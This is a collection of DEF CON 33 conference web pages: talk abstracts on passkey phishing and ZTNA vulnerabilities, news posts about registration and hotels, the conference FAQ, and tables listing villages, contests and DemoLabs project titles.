While passkeys are being touted as the end of phishing, they might be putting your organization at even more risk. In this talk I will demonstrate a relatively straightforward phishing attack against “phishing-resistant” synced passkeys and provide guidance and advice for responsible passkey usage.

SpeakerBio:  Chad Spensky, AllthenticatePh.D.

Chad is a teenage hacker turned cybersecurity expert who studied under the best in his field at UNC-CH, UCSB’s SecLab, IBM Research, and was a lead researcher at MIT LL where he played a pivotal role in various high-impact projects for the US DoD. He has broken every authentication system under the sun and has committed his career to doing better for our society.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Saturday - 10:40-11:10 PDT


Title: Your Static Tools Are Cute - My AI Ripped ZebLoader Apart
When: Saturday, Aug 9, 10:40 - 11:10 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
Speakers:Anna Pham,Edward Crowder

SpeakerBio:  Anna Pham
No BIO available
SpeakerBio:  Edward Crowder
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 15:30-16:15 PDT


Title: Zero Trust, Total Bust - Breaking into thousands of cloud-based VPNs with one bug
When: Saturday, Aug 9, 15:30 - 16:15 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

Many organisations are moving to Zero Trust Network Access (ZTNA) and Secure Access Service Edge (SASE) solutions in response to the real and well-documented risks associated with traditional VPNs. These cloud-era alternatives promise improved security through finer-grained access controls and better posture enforcement. But are these 'next-gen' cloud VPNs truly secure? In this 45-minute session, we present new research revealing that many leading ZTNA platforms - including offerings from ZScaler, Netskope and Check Point - inherit legacy VPN weaknesses while introducing fresh cloud-based attack surfaces.

We demonstrate the process of external recon, bypassing authentication and device posture checks (including hardware ID spoofing) and abuse insecure inter-process communication (IPC) between ZTNA client components to achieve local privilege escalation. We show it is possible to circumvent traffic steering to reach blocked content, exploit flaws in authentication flows to undermine device trust, and even run malicious ZTNA servers that execute code on connecting clients. Throughout the presentation, we highlight previously undisclosed vulnerabilities identified during our research. Zero trust does not mean zero risk.

References:

  • Building on our previous work on SSL VPNs link
  • Previous work by Sander di Wit (@sander_dewit on X).
Speakers:David "johnnyspandex" Cash,Rich "Buffaloverflow" Warren

SpeakerBio:  David "johnnyspandex" Cash, Red Team Operator at AmberWolf

Red Team Operator at AmberWolf (formerly with NCC Group). Co-presenter of 'Very Pwnable Networks: Exploiting the Top Corporate VPN Clients for Remote Root and SYSTEM Shells' at SANS HackFest Hollywood 2024. David has led red team operations uncovering critical flaws in enterprise remote access tools and has a passion for reverse engineering security products.

SpeakerBio:  Rich "Buffaloverflow" Warren, Red Team Operator at AmberWolf

Red Team Operator at AmberWolf and Microsoft Top 100 Security Researcher (formerly with NCC Group). Co-presenter of 'Very Pwnable Networks: Exploiting the Top Corporate VPN Clients…' at HackFest Hollywood 2024. Richard has a track record of discovering novel vulnerabilities in VPN and zero-trust clients and has contributed to multiple high-profile vulnerability disclosures and tools in the offensive security community.


Return to Index    -    Add to Google    -    ics Calendar file

DEF CON News


Workshops Registration announced!

lawsuit update

Registration for DEF CON workshops will open at precisely noon Pacific Daylight Time on July 15. It's a good idea to have your clicking device oiled up and sighted in - spaces get snapped up very quickly.

The full lineup is on the Workshops Page . Get your faves and alts all lined up for maximum efficiency.

It's happening, people. Feel free to get amped.

Speakers and Workshops are Live!

speakers and workshops

Who's speaking on the main stages at DEF CON ? What DEF CON Workshops are going to be available? Inquiring minds want to know!

Lucky day for you, curious netizens. The listings for both are live now on the #dc33 website. Familiarize yourself with the lineup, and make your plans accordingly.

Final stretch people. DEF CON positively LOOMS on the horizon!

Workshops submission responses are out!

Workshops update

Friendly reminder to all Workshops CFP submitters: Responses have gone out! If you don't see a response to your submission in your inbox, please check your spam folder.

Thanks to everyone who sent in a submission and congratulations to everyone that's been selected.

Parties, Meetups, & Events Page is live!

Parties, Meetups, and events page screen cap

Less than two months until DEF CON 33! Time to start planning to make the most of your DEF CON experience.

One of the best parts of DEF CON is meeting other humans and bonding over shared interests. On the Parties, Meetups and Events page you'll find a shockingly comprehensive list of group hangs. Whether you're into Running or Ham Radio, Blanket Forts or Karaoke, we've got you covered.

Set aside some time for fun and connection. Your people are waiting.

DEF CON 33 Lodging Update

DEF CON 33 logo with lodging update underneath

DC33 planning alert - The DEF CON room block at the Fontainebleau is sold out. The blocks at the Sahara and Venetian are filling up. To lock down your own deep DEF CON 33 discounts visit defcon.org for the reg links.

August will be here before you know it. Make sure you plan accordingly.

See you soon!

Call for Authors!

stack of books glitched with DEF CON 33 logo

Attention independent authors! DEF CON 33 is offering a space for book signings in the Vendor area . If you've got a book that will appeal to the DEF CON Community, we encourage you to submit it for consideration.

Get your work (and yourself) in front of a vibrant, engaged community of enthusiastic readers.

DEF CON 33 Short Story Contest!

Short story contest open with hands typing

Attention all scribes and tale-weavers of the DEF CON community - the DEF CON 33 Short Story Contest is open for business! It takes place entirely online - you can find the details at https://forum.defcon.org/node/252691 .

The theme is Access Everywhere. In addition to literary glory, you can also win free human badges for DC33.

let's GO.

DEF CON Training Las Vegas Registration Now Open!

DEF CON Las Vegas Training Registration

DEF CON Training Las Vegas Registration is officially open! Expanded menu includes dozens of course options, new 4-day trainings and a $200 earlybird discount. Join us in August for DEF CON style hands-on technical training from our world-class trainers. Information and signup at training.defcon.org . Reserve your spot now!

DEF CON 33 Theme Drop!

DEF CON 33 theme

"Access Everywhere."

This year we're thinking about how to make information and services available to everyone. Available wherever you are, whoever you are, and usable no matter how you need to connect.

Less walled gardens, more sunlight.

You can read the theme story and get some visual inspiration on the DEF CON 33 Theme and Style Guide page . You can get it in a PDF on media.defcon.org . Homework assignments to get you into the vibe coming soon.

We can't wait to see where you'll take it.

See you at DEF CON!

Pre-reg for DEF CON 33 opens 3/5!

laptop with DEF CON 33 ticket on screen

DEF CON 33 is building steam. Planning is in full swing. In fact, a glance at any nearby calendar will tell you we're already halfway there!

We know you need to plan, too. That's why we're opening up Early Bird Online Registration. For the go-getters who register early, weve got our lowest online price. And just like in years past, registering online guarantees your badge, no matter what the attendance numbers turn out to be.

Starting Wednesday you'll be able to hit up shop.defcon.org to get your ticket. Are you ready?

The Early Reg price is $540 ($520 +$20 processing fee.) Early Bird season ends May 23.

Regular Pricing is $560 ($540 + $20 processing) and is available until July 18.

Late Pricing is $580 ($560 +$20 processing) from July 19 to the close of Online Registration.

As always, online registration is not required. The cash-at-the-door price is just $500, and it comes with the bonus of our world-famous LineCon.

We're very excited about how DEF CON 33 is shaping up. We hope you are too.Past the halfway point, people. Let's GO.

New Calls Open! CFP, Workshops, Demo Labs, and Policy!

DEF CON 33

The DEF CON 33 Call Season is now almost complete! The Call for Papers is LIVE. We're also ready to accept submissions for Demos, Workshops, and Policy. Things are well and truly underway. Time to breathe deep, gather your ideas and get busy proposing.

For the comprehensive list of open calls, visit the DEF CON 33 Call Index . Rules, guidance, deadlines – it's all there.

Participation is the cheat code that unlocks the secret DEF CON levels. We can't wait to see what you've got in mind.

DEF CON 33 Open Calls!

DEF CON 33 Open Calls

The moment has arrived - the DEF CON 33 Call Season is officially afoot! Time to get thinking on how you want to participate. Whether you've got ideas to start a new Village, or have the tunes to rock the crowd after hours, the doors are open. There are a bunch of Calls you can peruse at leisure from Contests to Soundtrack to Vendors, and all the info you need to get started is on the DEF CON 33 Call Index .

Don't let your dreams be dreams! Make this the year your idea makes headlines at DEF CON.

DEF CON season is underway, people. Let's get after it.

DEF CON CTF Quals Dates Announced!

CTF qualifier dates

DEF CON 33 CTF Qualifcations have a date! "Packet sorcerers, make room in your calendar for the official qualifier event for #defcon 33 CTF! Our esteemed colleagues at the Nautilus Institute are hard at work building the challenges - can you afford to do less?"

Further information available at https://nautilus.institute . The long season of preparation begins.

New Room Block for DEF CON 33: Fontainebleau!

Fontainebleau Hotel

Another discounted room block for DEF CON 33 has dropped! This time it's at the ultra-swanky Fontainebleau, just a short walk from the LVCC.To book yourself into the Fontainebleau, you can call (833) 702-7272 between 6am to 10pm (PST) or use this link: https://book.passkey.com/go/DefCon2025FBLV . You can also reach the link from defcon.org.Maybe it's time to treat yourself. 2025 will be here before you know it.

DEF CON 2025 Call for Trainers is Open!

DEF CON Training logo

Attention DEF CON educators ! The DEF CON Training 2025 Call for Trainers is live!

We're looking for unique, technical, and practical presentations from trainers with deep knowledge of their subject. If that's you, let's talk!

All the info you need to apply is at training.defcon.org .

Room block now open at the Venetian for DEF CON 33!

Sahara and Venetian hotels

Good news, everyone! We've already got some discounted room blocks you can use to lock down your lodgings for DEF CON 33.

DC33 doesn't kick off until August 7, 2025, but that's no reason to lollygag. If you're a high-octane go-getter you already know how good it feels to get those To-Do items checked off early. If not, this is far enough ahead to forget you booked and give yourself a nice surprise when there's one less thing to do at crunch time.

You can book at the Venetian now and get the DC33 ball rolling. We'll keep you posted as additional options become available.

We're already 2 months closer to the next DEF CON. Be prepared.


Return to Index
© 1992-2025 DEF CON Communications, Inc. All Rights Reserved | DEF CON Policies | DMCA Information

DEF CON FAQ


Frequently asked questions about DEF CON



What is DEF CON?

DEF CON is one of the oldest continuously running hacker conventions around, and also one of the largest.



How did DEF CON start?

Originally started in 1993, it was a meant to be a party for member of "Platinum Net", a Fido protocol based hacking network out of Canada. As the main U.S. hub I was helping the Platinum Net organizer (I forget his name) plan a closing party for all the member BBS systems and their users. He was going to shut down the network when his dad took a new job and had to move away. We talking about where we might hold it, when all of a sudden he left early and disappeared. I was just planning a party for a network that was shut down, except for my U.S. nodes. I decided what the hell, I'll invite the members of all the other networks my BBS (A Dark Tangent System) system was a part of including Cyber Crime International (CCI), Hit Net, Tired of Protection (ToP), and like 8 others I can't remember. Why not invite everyone on #hack? Good idea!



Where did the name come from?

The short answer is a combination of places. There as a SummerCon in the summer, a HoHoCon in the winter, a PumpCon during Halloween, etc. I didn't want any association with a time of year. If you are a Phreak, or just use your phone a lot you'll notes "DEF" is #3 on the phone. If you are into military lingo DEF CON is short for "Defense Condition." Now being a fan of the movie War Games I took note that the main character, David Lightman, lived in Seattle, as I do, and chose to nuke Las Vegas with W.O.P.R. when given the chance. Well I knew I was doing a con in Vegas, so it all just sort of worked out.

There are several resources that will give you an idea of what DEF CON is all about.

DEF CON Press: through the prism of the media
DEF CON Groups: Local groups that meet
DEF CON Media Server: DC 1 to the present, captured
Google: always a good research starting point
Just remember, DEF CON is what you make of it.



When and where is DEF CON?

DEF CON is generally in the last week of July or first week of August in Las Vegas. DEF CON 33 will be held August 7th through August 10th, 2025. Many people arrive a day early, and many stay a day later.


Isn't there a DEF CON FAQ already?

Yes, an unofficial one. It's quite humorous, sometimes informative, and DEF CON takes no responsibility for its content. It is archived here.



What are the rules of DEF CON?

Physical violence is prohibited. Harassment of any kind is prohibited. We don't support illegal drug use. Minors should be accompanied by their parent(s) or guardian(s). Please refrain from doing anything that might jeopardize the conference or attendees such as lighting your hair on fire or throwing lit road flares in elevators. DEF CON Goons are there to answer your questions and keep everything moving. Hotel security is there to watch over their property. Each has a different mission, and it is wise to not anger the hotel people. Please be aware that if you engage in illegal activities there is a large contingency of feds that attend DEF CON. Talking about how you are going to bomb the RNC convention in front of an FBI agent is a Career Limiting Move!

You can view the DEF CON Code of Conduct at https://defcon.org/html/links/dc-code-of-conduct.html.



Is DEF CON cancelled?

No.



What is there to do at DEF CON?

DEF CON is a unique experience for each con-goer. If you google around you'll find dozens of write-ups that will give you an idea of what people have experienced at DEF CON. Trust write-ups more than media articles about the con. Some people play capture the flag 24x7, while many people never touch a computer at DEF CON. Some people see every speech they can, while others miss all speeches. Other activities include contests, movie marathons, scavenger hunts, sleep deprivation, lock picking, warez trading, drunken parties, spot the fed contest, the official music events. Because DEF CON is what the attendees make of it, there are more events than even we are aware of. Half the fun is learning what happened at DEF CON after the fact!



I'm not a hacker, should I go to DEF CON?

Many people have different definitions of what is a ‘hacker’. I would recommend looking at previous years speeches, and write-ups from past attendees - this should give you a good idea if DEF CON is for you. This hacker FAQ might give you some insight into the matter as well. If you do not have any technical interests, DEF CON is probably not for you. Sure there is a lot of socializing you can do, but technology and hacking is the core of the con.



Do criminals go to DEF CON?

Yes. They also go to high school, college, work in your workplace, and the government. There are also lawyers, law enforcement agents, civil libertarians, cryptographers, and hackers in attendance. Ssshhh. Don't tell anyone.



What are Goons?

They are the staff at DEF CON. They have many roles including safety, speaker coordination, vendor room coordination, network operations, et cetera... Please try to be helpful to them if they make requests of you. If any goon tells you to move, please do so immediately as there may be safety issues they are attempting to address.



How can I help out or become a Goon?

The staff at DEF CON has grown organically. All positions have some degree of trust associated with them, so typically new goons are ‘inducted’ by friends of existing goons. There are many random points when goons need help and may ask people for help, generally for helping move stuff or other tasks that don't require high amounts of trust or unsupervised work. Just because you help out doesn't make you a goon. If you really want to be a goon, talk with one and see how much work they actually do (Hint: you may want to enjoy being at DEF CON, not working full-time at it). One year the network group got a new Goon when a networking engineer was needed, and he came to the rescue. The intent behind the goons is not to be elitist, but to have a network of trusted people who can help run the conference - please do not feel upset if you are not chosen to be a goon.



How can I help or participate?

DEF CON is not a spectator sport! Before the con, during, and after there are chances for you to get involved. Before the con you can read about the contests and maybe sign up for one like Capture the Flag. There are artwork contests for shirts and posters. You can practice your lock pick skills, or just get your laptop all locked down and ready to do battle. Organize your .mp3s. Check out the DEF CON Forums to see what other people are up to. If you want to create your own event, you can do that as well - you will not get official space or sanctions, but virtually every official event at DEF CON started out as an unofficial event.



I would love to see XYZ event, how do I make this happen?

Virtually all events at DEF CON were conceived by the attendees. The DEF CON forums are a great place for recruiting help for an event you want to put on, and making sure your efforts aren't being duplicated. If it doesn't require resources from DEF CON (space, namely) you generally don't have to ask anyone’s permission. Most events are unofficial until they've been going on for a couple of years. Please let us know if you have an idea for an event, we may help facilitate or promote it. Email [suggestions at DEF CON dot org] to keep us in the loop.



How can I speak at DEF CON?

You can submit a response to our CFP (opening soon). All entries are read and evaluated by a selection committee. We would love to have your submission. The call for papers usually opens in January and closes mid-May.



I'm press, how do I sign up, why can't I get in for free (I'm just doing my job)?

Please email press[at]defcon[d0t]org if you wish press credentials. Lots of people come to DEF CON and are doing their job; security professionals, federal agents, and the press. It wouldn't be fair to DEF CON attendees if we exempted one group from paying. If you are a major network and plan on doing a two minute piece showing all the people with blue hair, you probably shouldn't bother applying for a press pass - you won't get one. If you are a security writer or from a real publication please submit, and someone will respond with an answer.



I want to sell stuff, how do I do this?

If you want a space in our vendor area, you need to apply. Because of limited space and our attempt to have a diversity of vendors, you may not be able to get a booth. It is wise to think of staffing issues - if you are one person do you want to spend your entire time behind a vendors booth?



What are the different price rates?

Everyone pays the same: The government, the media, the ‘well known hackers’, the unknown script kiddies. The only discount is for Goons and speakers, who get to work without paying for the privilege.



How much is admission DEF CON, and do you take credit cards?

Online pricing at shop.defcon.org ( where you can pay with a credit card) is as follows:

The Early Reg price is $540 ($520 +$20 processing fee.) Early Bird season ends May 23.

Regular Pricing is $560 ($540 + $20 processing) and is available until July 18.

Late Pricing is $580 ($560 +$20 processing) from July 19 to the close of Online Registration.

As always, online registration is not required. The cash-at-the-door price is just $500, and it comes with the bonus of our world-famous LineCon.



Does my underage child need a badge?

Children under the age of 8 will not need to purchase a badge.



Can I get a discount on DEF CON badges?

DEF CON charges one price regardless of your social status or affiliation. Please know that we depend on attendee income to pay the costs of the conference and don't have sponsors to help defray the expenses.

We sometimes get requests for discounts [students, veterans, children], unfortunately we don't want to try and validate if you are a current student, look at your ID to determine your age, decode military discharge papers, etc.

If you really want to attend DEF CON for free then do something for the con.

You could:
Submit a CFP and be an accepted speaker or workshop instructor.
Work on a contest, event, or village.
Qualify for CTF/Contests that include entry.
Find a team to become a Goon newbie.
Contribute to content, or perform some entertainment.


I need a letter of invite for my visa application, how do I get that?

In most cases, DEF CON can send a signed letter of invite, usually within a few short business days once we have all the info. If you also require verification of housing, we can put you in touch with someone to help you get your hotel stay organized, let us know if you need that.

Along with your request, please email us the following to info(at)defcon(.)org

Name as is on passport:
Passport number:
Country of issue:
Date of issue:
Date of expiration:
Country of origin:


DEF CON is too expensive, how can I afford it?

Many people have made an art and science out of coming to DEF CON very cheaply. Here are a couple of tips.

Travel: Buy airfare in advance, go Greyhound, Carpool, hitch-hike. (Note: this may be dangerous and/or illegal.)
Lodging: Share rooms - some people have up to 10 people they share a room with, find a hotel cheaper than the one that the conference is scheduled at, stay up for three days, etc. (note: this can be hazardous to your health.)
Food: Pack food for your trip, go off site to find food, eat in your hotel rooms, and look for cheap Vegas food at Casinos. (Look for deals and specials that are trying to get you in the door to gamble.)
Booze: You don't need to drink. Brew your own and bring it. (It's been done.)
Entrance: Admission can be saved, mow some lawns. Try to go to another 4 day event for cheaper than this that offers so much. We have increased the fees slowly over the years, but also the amount and quality of events have increased.

Inevitably people will try to do some math and pretend that DT gets rich each DEF CON - they seem to lack the ability to subtract.



How many people typically attend DEF CON?

There have been roughly 25-28k attendees in the last few (pre-COVID) years of DEF CON. DEF CON 27 had a record showing with approximately 30,000.



Is there a network at DEF CON?

Why yes, DEF CON is FULLY network-enabled. Now that we've perfected the art of a stable hacker con network, we're ascending to a higher level - we're providing you a network that you feel SAFE in using! Since DEF CON 18 we're WPA2 encrypted over-the-air, with a direct trunk out to the Internet. No peer-to-peer, no sniffing, just straight to the net (and internal servers). We'll provide login credentials at Registration. We know the LTE airwaves will be saturated so we're putting our own cred on the line to give you a net that even we would put our own mobile phones on.

If you're feeling frisky, we'll still have the traditional "open" network for you - bring your laptop (we'd recommend a clean OS, fully patched--you know the procedure) because we don't police what happens on that net. Share & enjoy!



What is the age limit?

People have brought children to DEF CON - it is not recommended to do this unless you are going to constantly supervise them. It is generally an ‘adult’ atmosphere (language, booze, et cetera). If you've never been to DEF CON, you may want to refrain from bringing your children (unless they are demanding that you bring them). While there are no age limits, we have consistently cooperated with parents and/or private investigators who are looking for children that ‘ran away from home’ to go to DEF CON. You will have to be 21 to reserve a room.



What is a DEF CON "Black Badge"?

The Black Badge is the highest award DEF CON gives to contest winners of certain events. CTF winners sometimes earn these, as well as Hacker Jeopardy winners. The contests that are awarded Black Badges vary from year to year, and a Black Badge allows free entrance to DEF CON for life, potentially a value of thousands of dollars.



How can I get a hold of DT? I tried to mail him and haven't seen a response yet.

DT doesn't dislike you, isn't trying to hurt your feelings, and bears you no ill will. The fact is he gets an unmanageable load of mail continually. Mailing him again may elicit a response. Try mailing FAQ (at) DEFCON.ORG if you have a general question that isn't answered here or in the forums.



Is it hot in Vegas?

Yes. Bring sunscreen (high SPF), do not fall asleep near the pool (lest you wake up to sunburn), and do not walk far in the sun unless you are experienced in dealing with extreme heat. The sun is dangerous in Las Vegas. Sleeping in lawn chairs is a sure way to wake up to severe burns in the morning when that bright yellow thing scorches your skin. Drink plenty of water and liquids - remember that alcohol will dehydrate you.



What should I bring?

It depends on what you're going to do at DEF CON. This is discussed in quite some depth on the unofficial DC FAQ, as well as a thread in the DC Forums. You may want to bring fancy (or outrageously silly) clothes for the official Music events, on Friday and Saturday nights, where everyone shows off nifty attire.



How much do rooms cost, and how do I reserve a room?

Currently we have room blocks at Venetian, and Sahara

Check the the DEF CON 33 venue page periodically for more as we add them


How much is internet access?

We are looking into this. Free (and possibly more dangerous) internet access is available in the convention area.



Will the hotels broadcast the speeches on their cable system?

DEF CON TV has succcessfully streamed all tracks to all the hotels in the past, and a couple of tracks out to the internet, for several years now. We are navigating a new venue and new hotels, so stay tuned. If we can, we probably will!



Will we have DEF CON branded poker chips?

You will have to attend DEF CON to find out.



Will conference attendees have entire floors of hotel rooms to themselves?

Probably not. Hotels have been very cooperative in attempting to centralize the DEF CON attendees, for their convenience and ours, but there will be non-DEF CON attendees in hotel rooms next to us.



This FAQ didn't answer my questions, or was unclear, how can I get further information?

Check out the DEF CON Forums to ask follow up questions.


Return to Index
© 1992-2025 DEF CON Communications, Inc. All Rights Reserved | DEF CON Policies | DMCA Information

DEF CON Villages Table

Each Village, as it’s name may imply, specializes in a topic or aspect of security or computers.

One Page All Villages list with descriptions

defcon.org Villages page

You may need to scroll to the right to see all info

Village Name
Home Page
Map Schedule Village
Desc
Social Media
Links
Adversary Village Map Desc TW @AdversaryVillag
      https://defcon.social/@AdversaryVillage
YT https://youtube.com/AdversaryVillage
DC http://adversaryvillage.org/discord
TI @AdversaryVillage
FB @AdversaryVillage
LI @adversaryvillage
Aerospace Village Map Desc TW @secureaerospace
LI @aerospace-village
TW @hack_a_sat
DC https://discord.gg/gV4EWuk
YT https://www.youtube.com/c/AerospaceVillage
      https://defcon.social/@aerospacevillage
AppSec Village Map Desc TW @AppSec_Village
LI @appsecvillage
YT https://www.youtube.com/c/AppSecVillage
DC https://discord.gg/5XY8qYXd7R
Artificial Intelligence Village Map Desc TW @aivillage_dc
TI @aivillage
YT link
DC https://discord.com/invite/GX5fhfT
Artificial Intelligence Cyber Challenge Map Sched Desc TW @DARPA
Bio Hacking Village Map Desc TW @dc_bhv
LI @biohacking-village
YT http://youtube.com/biohackingvillage
TI @biohackingvillage
DC https://discord.gg/Q8ubDb5
IG @biohacking_village
      link
Blacks in Cybersecurity Map Desc TW @BlackInCyberCo1
      https://defcon.social/@blacksincyber
TI @blacksincybersecurity
YT link
LI @blackincyberconference
PT @blacksincybersecurity
FB @blackincyberconf
Blue Team Village Map Desc TW @BlueTeamVillage
TI @blueteamvillage
YT https://www.youtube.com/c/blueteamvillage
DC https://discord.gg/blueteamvillage
      https://defcon.social/@blueteamvillage
Bug Bounty Village Map Desc TW @BugBountyDEFCON
YT https://www.youtube.com/BountyTalks
TW @arl_rose
TW @infinitelogins
YT https://www.youtube.com/infinitelogins
Car Hacking Village Map Desc TW @CarHackVillage
YT http://youtube.com/@carhackingvillage
LI @car-hacking-village
DC https://discord.gg/JWCcTAM
Cloud Village Map Desc TW @cloudvillage_dc
YT https://www.youtube.com/cloudvillage_dc
DC https://discord.gg/EygUDJABee
Contests Map Sched       link
Crypto Privacy Village Map Desc TW @cryptovillage
SL https://cryptovillage.slack.com/
YT link
TI @cryptovillage
      https://defcon.social/@cryptovillage
Data Duplication Village Map Desc TW @DDV_DC
DEF CON DemoLabs Map Sched
DEF CON Groups Map
DEF CON Groups VR Map TW @DCGVR
TI @defcon_groups
DC https://discord.gg/bsX4QXf3rD
YT link
DEF CON Hackers with Disabilities Map TW @HDA_DEFCON
DEF CON Talks Map Sched TW @defcon
FB @defcon
YT https://www.youtube.com/user/DEFCONConference
      http://www.reddit.com/r/defcon
IG @wearedefcon
DC https://discord.gg/defcon
DEF CON Workshops Map Sched
Embedded Systems Village Map Desc TW @EmbeddedVillage
Game Hacking Village Desc
Ham Radio Village Map Desc TW @HamRadioVillage
TI @HamRadioVillage
DC https://discord.gg/hrv
      https://defcon.social/@HamRadioVillage
Hardware Hacking
Solder Skills Villages
Map Desc TW @DC_HHV
      https://defcon.social/@DC_HHV
Industrial Control Systems Village Map Desc TW @ICS_Village
LI @icsvillage
YT link
TI @ics_village
Internet Of Things Village Map Desc TW @iotvillage
TW @ISEsecurity
TW @Villageidiotlab
      https://defcon.social/@IoTVillage/
TI @iotvillage
YT https://www.youtube.com/c/IoTVillage/videos
DC https://discord.gg/EFKbNFrFaN
Lock Pick Village Map Desc TW @toool
TI @toool_us
YT https://youtube.com/c/TOOOL-US
      https://techhub.social/@TOOOL
Malware Village Desc       https://x.com/MalwareVillage
LI @malwarevillage
DC https://discord.com/invite/xQwqY48SrJ
Maritime Hacking Village Desc       https://x.com/maritimevillage
LI @maritimehackingvillage
Misc Sched
Packet Hacking Village Map Desc TW @wallofsheep
FB @wallofsheep
YT https://youtube.com/wallofsheep
TI @wallofsheep
PS https://www.periscope.tv/wallofsheep
      https://defcon.social/@wallofsheep
IG @wallofsheep
Payment Village Map Desc TW @paymentvillage
TI @paymentvillage
YT link
      https://t.me/paymentvillage
Physical Security Village Map Desc TW @physsec
TI @bypassvillage
LI @physsec
      https://defcon.social/@physsec
Policy Village Map Desc TW @DEFCONPolicy
      link
      https://defcon.social/@defconpolicy
Quantum Village Map Desc TW @quantum_village
DC https://discord.gg/6WUjH5cBXu
LI @quantumvillage
YT https://youtube.com/@quantum_village/
Radio Frequency Village Map Desc TW @rfhackers
TW @rf_ctf
      link
DC https://discordapp.com/invite/JjPQhKy
Recon Village Map Desc TW @ReconVillage
FB @reconvillage
YT https://www.youtube.com/reconvillage/
Red Team Village Map Desc TW @RedTeamVillage_
YT https://www.youtube.com/redteamvillage
TI @redteamvillage
DC https://discord.gg/redteamvillage
Social Activities: Parties/Meetups
Social Engineering Village Map Desc TW @sec_defcon
YT link
TI @se_community
LI @social-engineering-community
FB @Social-Engineering-Community-108883855139272
Telecom Village Map Desc TW @TelecomVillage
Voting Village Map Desc TW @votingvillagedc
YT link
TI @votingvillagedc
LI @election-integrity-foundation
IG @votingvillage?igsh=MWJreTh6dGl3eDEzNg==

DEF CON Contests Table

Various contests, some lasting all 4 days of DEF CON, some short time on stage

One Page All Contests list with descriptions

defcon.org Contests page

You may need to scroll to the right to see all info

? Cube
Contest Info
.ssh/ Social Scavenger Hunt
Contest Info
$$$$$_<CAPTURE_THE_COIN>_$$$$$
Contest Info
$unL1ght Sh4d0w5
Contest Info
5N4CK3Y
Contest Info
Adversary Wars CTF
Contest Info
AI Art Battle
Contest Info
Aw, man…pages!
Contest Info
Band Camp: Hacker My Music
Contest Info
Battle of the Bots: Vishing Edition
Contest Info
Betting on Your Digital Rights: 4th Annual EFF Benefit Poker Tournament at DEF CON 33
Contest Info
Beverage Cooling Contraption Contest
Contest Info
Blacks In Cybersecurity Village Capture The Flag Competition
Contest Info
Blue Team Village CTF
Contest Info
Bug Bounty Village CTF
Contest Info
Call Center Village Contest
Contest Info
Can it Ham?
Contest Info
Capture the Packet
Contest Info
Car Hacking Village Capture the Flag (CTF)
Contest Info
Cloud Village CTF
Contest Info
CMD+CTRL Cloud Cyber Range
Contest Info
Code Breaker Challenge
Contest Info
Code CRIMSON: Healthcare in Trauma
Contest Info
Creative Writing Short Story Contest
Contest Info
Cryptocurrency Challenge
Contest Info
Cyber Defender – The Game
Contest Info
Cyber Wargames
Contest Info
Cycle Override
Contest Info
Darknet-NG
Contest Info
DARPA’s Artificial Intelligence Cyber Challenge (AIxCC)
Contest Info
DC Sticker Design Contest
Contest Info
DC’s Next Top Threat Model
Contest Info
DEF CON Beard and Mustache Contest
Contest Info
DEF CON CTF
Contest Info
DEF CON MUD
Contest Info
DEF CON Scavenger Hunt
Contest Info
Dozier Drill Lockpicking Challenge
Contest Info
Dungeons@Defcon
Contest Info
EFF Tech Trivia
Contest Info
Embedded CTF
Contest Info
Feet Feud (Hacker Family Feud)
Contest Info
GenSec CTF
Contest Info
Hac-Man
Contest Info
Hack3r Runw@y Contest
Contest Info
Hacker Jeopardy
Contest Info
Hacking Boundary Ship Terminal
Contest Info
Hardware Hacking Village CTF
Contest Info
HardWired
Contest Info
HTB CTF: Data Dystopia
Contest Info
ICS Village CTF
Contest Info
Kubernetes CTF
Contest Info
Octopus Game 4: The Order of the White Tentacle
Contest Info
Password Village
Contest Info
Phish Stories
Contest Info
PhreakMe
Contest Info
Pinball High Score Contest
Contest Info
PROJECT ACCESS: A Fox Hunt in the Shadows
Contest Info
Pub Quiz at DEF CON
Contest Info
Radio Frequency Capture the Flag
Contest Info
Raitlin’s Challenge presented by the Illuminati Party®
Contest Info
REALI7Y OVERRUN
Contest Info
Red Alert ICS CTF
Contest Info
Red Team Village CTF
Contest Info
Scambait Village Contest
Contest Info
Silk’s Roadhouse
Contest Info
Social Engineering Community Vishing Competition (SECVC)
Contest Info
spyVspy
Contest Info
Taskmooster
Contest Info
TeleChallenge
Contest Info
The Gold Bug
Contest Info
The Pwnie Awards
Contest Info
Tin Foil Hat
Contest Info
venator aurum
Contest Info
warl0ck gam3z CTF
Contest Info
Whose Slide Is It Anyway?
Contest Info

DEF CON DemoLabs Table

Brief demonstrations for people to show off their project.

One Page All Demolabs list with descriptions

defcon.org DemoLabs page

You may need to scroll to the right to see all info

AIMaL – Artificially Intelligent Malware Launcher
Demolabs Info
AirBleed – Covert Bluetooth Plist Payload Injection
Demolabs Info
Angry Magpie – DLP Bypass Simulator
Demolabs Info
Attack Flow and Root Cause Discovery – No LLMs, No Queries, Just Explainable ML
Demolabs Info
Beaconator C2 Framework
Demolabs Info
Blackdagger – Cyber Workflow Automation Framework
Demolabs Info
BOAZ – A Multilayered Approach to AV/EDR Evasion Engineering
Demolabs Info
C4 – Cross Compatible Command and Control
Demolabs Info
Caldera for OT – Oops! All Software
Demolabs Info
Copycat – Identity Stealer Extension
Demolabs Info
Cryptosploit
Demolabs Info
DVBE – Damn Vulnerable Browser Extension
Demolabs Info
Dyna – Automating the OWASP MASTG with Offensive Android Tactics
Demolabs Info
Empire 6.0
Demolabs Info
EntraGoat – A Deliberately Vulnerable Entra ID Environment
Demolabs Info
FLARE-VM
Demolabs Info
Garuda Threat Hunting Framework
Demolabs Info
GlytchC2 – Command Execution and Data Exfiltration of Any Kind Through Live Streaming Platforms
Demolabs Info
Have I Been Ransomed?
Demolabs Info
Lex Sleuther
Demolabs Info
Messenger – Proxies Here There and Everywhere
Demolabs Info
Metasploit’s Latest Attack Capability and Workflow Improvements
Demolabs Info
MPIT – Matrix Prompt Injection Tool and ShinoLLMApps
Demolabs Info
Nebula – 4 Years and Still Kicking *aaS
Demolabs Info
nRootTag – Exploiting Find My and Transforming Computers Into Unauthorized Trackers
Demolabs Info
OAuthSeeker
Demolabs Info
PAPRa
Demolabs Info
PatchLeaks
Demolabs Info
promptmap2
Demolabs Info
RETCON – Reticulum Embedded Turnkey Connection Operating Node
Demolabs Info
RETINA – Realtime Electronic Threat and Intrusion Neutralization Apparatus
Demolabs Info
rev.ng Decompiler
Demolabs Info
Robin – The Archaeologist of the Dark Web
Demolabs Info
SAMLSmith
Demolabs Info
